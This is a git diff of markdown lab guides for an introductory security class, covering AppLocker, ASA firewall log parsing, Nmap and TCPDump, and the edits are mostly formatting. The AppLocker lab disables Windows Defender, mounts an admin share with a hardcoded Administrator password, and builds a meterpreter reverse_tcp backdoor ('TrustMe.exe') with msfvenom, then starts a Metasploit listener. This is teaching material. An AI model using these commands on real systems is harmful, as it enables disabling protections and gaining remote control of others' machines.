strandjs
diff --git a/‎IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md‎
Lines changed: 21 additions & 49 deletions b/‎IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md‎
Lines changed: 21 additions & 49 deletions
diff --git a/‎IntroClassFiles/Tools/IntroClass/FirewallLog/FirewallLog.md‎
Lines changed: 22 additions & 20 deletions b/‎IntroClassFiles/Tools/IntroClass/FirewallLog/FirewallLog.md‎
Lines changed: 22 additions & 20 deletions
diff --git a/‎IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md‎
Lines changed: 6 additions & 15 deletions b/‎IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md‎
Lines changed: 6 additions & 15 deletions
diff --git a/‎IntroClassFiles/Tools/IntroClass/RITA/RITA.md‎
Lines changed: 1 addition & 1 deletion b/‎IntroClassFiles/Tools/IntroClass/RITA/RITA.md‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎IntroClassFiles/Tools/IntroClass/TCPDump/TCPDump.md‎
Lines changed: 1 addition & 24 deletions b/‎IntroClassFiles/Tools/IntroClass/TCPDump/TCPDump.md‎
Lines changed: 1 addition & 24 deletions
@@ -1,101 +1,74 @@
 
 # AppLocker
 
-
 Applocker Instructions:
 
-Let’s see what happens when we do not have AppLocker running.  We will set up a simple backdoor and have it connect back to the Ubuntu system.  Remember, the goal is not to show how we can bypass EDR and Endpoint products.  It is to create a simple backdoor and have it connect back.
+Let’s see what happens when we do not have **AppLocker** running.  We will set up a simple backdoor and have it connect back to the **Ubuntu** system.  Remember, the goal is not to show how we can bypass **EDR** and **Endpoint** products.  It is to create a simple backdoor and have it connect back.
 
-Before we begin, we need to disable Defender. Start by opening an instance of Windows Powershell. Do this by clicking on the Powershell icon in the taskbar.
+Before we begin, we need to disable **Defender**. Start by opening an instance of Windows **Powershell**. Do this by clicking on the **Powershell** icon in the taskbar.
 
 ![](attachments/OpeningPowershell.png)
 
-Next, run the following command in the Powershell terminal:
+Next, run the following command in the **Powershell** terminal:
 
-<pre>Set-MpPreference -DisableRealtimeMonitoring $true</pre>
+`Set-MpPreference -DisableRealtimeMonitoring $true`
 
 ![](attachments/applocker_disabledefender.png)
 
 This will disable Defender for this session.
 
-If you get angry red errors, that is Ok, it means Defender is not running.
+If you get angry red errors, that is ==**Ok**==, it means **Defender** is not running.
 
-Let’s get started by opening a Kali instance.
+Let’s get started by opening a **Kali** instance.
 
 ![](attachments/OpeningKaliInstance.png)
 
-Alternatively, you can click on the Kali icon in the taskbar.
+Alternatively, you can click on the **Kali** icon in the taskbar.
 
 ![](attachments/TaskbarKaliIcon.png)
 
-####NOTE##### 
-
-If you are having trouble with Windows Terminal, you can simply start each of the three shells, we use by starting them directly from the Windows Start button. 
-
- 
-
-Simply click the Windows Start button in the lower left of your screen and type: 
-
- 
-
-`Powershell` 
-
-or 
-
-`Ubuntu`
-
-or 
-
-`Command Prompt` 
-
- 
-
-For PowerShell and Command Prompt, please right click on them and select Run As Administrator 
-
-###END NOTE###
-
 Let's start by getting root access in our terminal.
 
-<pre>sudo su -</pre>
+`sudo su -`
 
 Next, lets run the following command to get our IP address:
 
-<pre>ifconfig</pre>
+`ifconfig`
 
-Please note the IP address of your Ethernet adapter.
+==**Please note the IP address of Y-O-U-R Ethernet adapter.**==
 
 ![](attachments/applocker_ifconfig.png)
 
-Please note that my adapter is called `eth0` and my IP address is `10.10.1.117` Your IP Address and adapter name may be different.
-
-Remember this IP by writing it down, etc.
+Please note that my adapter is called **"eth0"** and my IP address is **"10.10.1.117"** Your IP Address and adapter name may be different.
 
 First, we need to run the following command in order to mount our remote system to the correct directory:
 
-<pre>mount -t cifs //10.10.1.209/c$ /mnt/windows-share -o username=Administrator,password=T@GEq5%r2XJh</pre>
+`mount -t cifs //10.10.1.209/c$ /mnt/windows-share -o username=Administrator,password=T@GEq5%r2XJh`
 
-Now, run the following commands to start a simple backdoor and backdoor listener: 
+Run the following commands to start a simple backdoor and backdoor listener: 
 
-<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<YOUR LINUX IP> lport=4444 
--f exe -o /tmp/TrustMe.exe</pre>
+`msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<YOUR LINUX IP> lport=4444 
+-f exe -o /tmp/TrustMe.exe`
 
 `cd /tmp`
 
 `ls -l TrustMe.exe`
 
-
 `cp ./TrustMe.exe /mnt/c/tools`
 
+Let's start the **Metasploit Handler**.  First, open a new Ubuntu Terminal by clicking the down carrot then selecting Ubuntu-18.04.
 
-Now, let's start the Metasploit Handler.  First, open a new Ubuntu Terminal by clicking the down carrot then selecting Ubuntu-18.04.
+This is what your terminal will look like before getting root.  
+
+==root@DESKTOP-I1T2G01:/tmp#== `msfconsole -q`
 
 Let's become root.
 
 `sudo su -`
 
-root@DESKTOP-I1T2G01:/tmp# `msfconsole -q`
+==msf5== > `use exploit/multi/handler`
 
-msf5 > `use exploit/multi/handler`
+The Metasploit Handler successfully ran if the terminal now starts with "**msf5**"
 
 msf5 exploit(multi/handler) > `set PAYLOAD windows/meterpreter/reverse_tcp`
 
@@ -107,7 +80,6 @@ Remember, your IP will be different!
 
 msf5 exploit(multi/handler) > `exploit`
 
-
 It should look like this:
 
 ![](attachments/Clipboard_2020-06-12-12-46-10.png)
 
@@ -1,51 +1,51 @@
 
 # Firewall Log Review
 
-In this lab we will be looking at a log from an ASA firewall from Cisco.
+In this lab we will be looking at a log from an **ASA firewall** from Cisco.
 
-And wow....  They are bad to work with. 
+**And wow....  They are bad to work with.**
 
-However, with the power of Bash scripting we can get some useful information.
+However, with the power of **Bash scripting** we can get some useful information.
 
-Let’s get started by opening a Kali Instance.
+Let’s get started by opening a **Kali** Instance.
 
 ![](attachments/OpeningKaliInstance.png)
 
-Alternatively, you can click on the Kali Logo in the taskbar.
+Alternatively, you can click on the **Kali Logo** in the taskbar.
 
 ![](attachments/TaskbarKaliIcon.png)
 
 Let's start by gaining root access by running the following:
 
-<pre>sudo su -</pre>
+`sudo su -`
 
 Next, we can run the following:
 
-<pre>sudo apt install r-base-core</pre>
+`sudo apt install r-base-core`
 
-Next, let's get your Linux system to do some math!
+Next, let's get your **Linux** system to do some math!
 
 First, we need to navigate to the correct directory with the following command:
 
-<pre>cd /opt/firewall_log</pre>
+`cd /opt/firewall_log`
 
-Now, let's look into the logs.  The logs file is quite extensive, so in order to narrow our scope, we will use `grep`.
+Now, let's look into the logs.  The logs file is quite extensive, so in order to narrow our scope, we will use **"grep".**
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | less</pre>
+`grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | less`
 
 ![](attachments/fwlr_lessasa.png)
 
-That is a nightmare....
+**==That is a nightmare....==**
 
 Not only is there a ton of information here, you might now feel like you are stuck in your terminal window.
 
-No worries though, just hit `q` to return to your terminal.
+No worries though, just hit **"q"** to return to your terminal.
 
 Let's refine the output a little more by running the following command:
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14</pre>
+`grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14`
 
-This command focuses on the closed connections (FIN) and pull just specific fields out of the data to clean it up.   We use cut with the -d switch to specify the delimiter, which is a space.  Then, we tell it what fields, or columns of the output, we are interested in. 
+This command focuses on the closed connections **(FIN)** and pull just specific fields out of the data to clean it up.   We use cut with the **"-d"** switch to specify the delimiter, which is a space.  Then, we tell it what fields, or columns of the output, we are interested in. 
 
 When put together, our output looks something like this:
 
@@ -58,30 +58,32 @@ If you look at our previous output, you may notice that outside connections are
 
 So why don't we look at just the connections made to `13.107.237.38` by running the following command:
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 13.107.237.38 | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14</pre>
+`grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 13.107.237.38 | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14`
 
 ![](attachments/fwlr_grep13107.png)
 
 This output shows us all of the data coming from `13.107.237.38`
 
 Don't forget, there were also a lot of connections from `18.160.185.174`.  Here, let's zoom in on that IP as well:
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14</pre>
+`grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14`
 
 ![](attachments/fwlr_grep18160.png)
 
 Look at the last field.  See a pattern?  Is there one?  Let's see just that field!
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 14</pre>
+`grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 14`
 
 All we should see now is this:
 
 ![](attachments/fwlr_f14.png)
 
 Now let's do some math in that field!
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 8,14 | tr : ' ' | tr / ' '  | cut -d ' ' -f 4 | Rscript -e 'y <-scan("stdin", quiet=TRUE)' -e 'cat(min(y), max(y), mean(y), sd(y), var(y), sep="\n")'</pre>
+`grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 8,14 | tr : ' ' | tr / ' '  | cut -d ' ' -f 4 | Rscript -e 'y <-scan("stdin", quiet=TRUE)' -e 'cat(min(y), max(y), mean(y), sd(y), var(y), sep="\n")'`
 
 Your output should look something like this:
 
-![](attachments/fwlr_math.png)
+![](attachments/fwlr_math.png)
+
+There are a lot of commands you can use to alter your view of the logs.  
@@ -1,7 +1,7 @@
 
 # Host Firewalls and Nmap
 
-In this lab we will be scanning your Windows system from your Linux terminal with the firewall both on and off. 
+In this lab we will be scanning your **Windows** system from your **Linux** terminal with the firewall both on and off. 
 
 The goal is to show you how a system is very different to the network with a firewall enabled. 
 
@@ -11,7 +11,7 @@ Let's get started by opening a command prompt terminal. You can do this by click
 
 ![](attachments/openingcommandprompt%20-%20Copy.png)
 
-####NOTE##### 
+From the command prompt we need to get the IP address of your **Windows** system:
 
 If you are having trouble with Windows Terminal, you can simply start each of the three shells, we use by starting them directly from the Windows Start button. 
 
@@ -53,7 +53,7 @@ Alternatively, you can click on the Kali logo in the taskbar.
 
 ![](attachments/TaskbarKaliIcon.png)
 
-Next, let’s become root:
+Let’s become root:
 
 <pre>sudo su -</pre>
 
@@ -69,12 +69,11 @@ It should look like this:
 
 Please note the open ports. These are ports and services that an attacker could use to authenticate to your system.  Or, attack if an exploit is available. 
 
-
-Now, let’s go back to the Windows command prompt, by clicking the icon in the taskbar.
+Let’s go back to the Windows command prompt, by selecting the Administrator: Command Prompt tab.
 
 ![](attachments/openingcommandprompt%20-%20Copy.png)
 
-Now, let’s enable the Windows firewall:
+Let’s enable the Windows firewall:
 
 <pre>netsh advfirewall set allprofiles state on</pre>
 
@@ -84,7 +83,7 @@ Now, let’s rescan from the Kali terminal. You can navigate back to it by press
 
 ![](attachments/TaskbarKaliIcon.png)
 
-Then, rerun the scan
+Rerun the scan
 
 <pre>nmap 10.10.1.209</pre>
 
@@ -96,16 +95,8 @@ It should look like this:
 
 ![](attachments/nmap_nmapscanwfirewall.png)
 
-
 Now, using the same process as before, let’s disable the Windows firewall to go back to the base state:
 
 <pre>netsh advfirewall set allprofiles state off</pre>
 
 ![](attachments/nmap_turnbackon.png)
-
-
-
-
-
-
-
@@ -12,7 +12,7 @@ First, open File Explorer:
 
 ![](attachments/OpeningFileExplorer.png)
 
-Then, select the tools directory:
+Then, select the IntroLabs directory:
 
 ![](attachments/rita_navintrolabs.png)
 
 
@@ -13,29 +13,6 @@ Alternatively, you can click on the Kali logo in the taskbar.
 
 ![](attachments/TaskbarKaliIcon.png)
 
-==####NOTE#####==
-
-If you are having trouble with **Windows Terminal**, start each terminal directly from the** Windows Start button**. 
-
-Click the Windows Start button in the lower left of your screen and type the following. 
-
-
-`Powershell` 
-
-or 
-
-`Ubuntu`
-
-or 
-
-`Command Prompt` 
-
- 
-
-For PowerShell and Command Prompt, please right click on them and select **Run As Administrator **
-
-==###END NOTE###==
-
 First, we need to get into the root shell. 
 
 ` sudo su - `
@@ -103,7 +80,7 @@ Lets dig into the packet with the timestamp of 08:14:32.638976
 
 ![](attachments/tcpdump_powershell.png)
 
-Ouch, it looks like **PowerShell**!!!  A favorite of attackers and pentesters alike.  Furthermore, it looks like there is **Base64** data.
+Ouch, it looks like **PowerShell!!!**  A favorite of attackers and pentesters alike.  Furthermore, it looks like there is **Base64** data.
 
 ![](attachments/tcpdump_base64.png)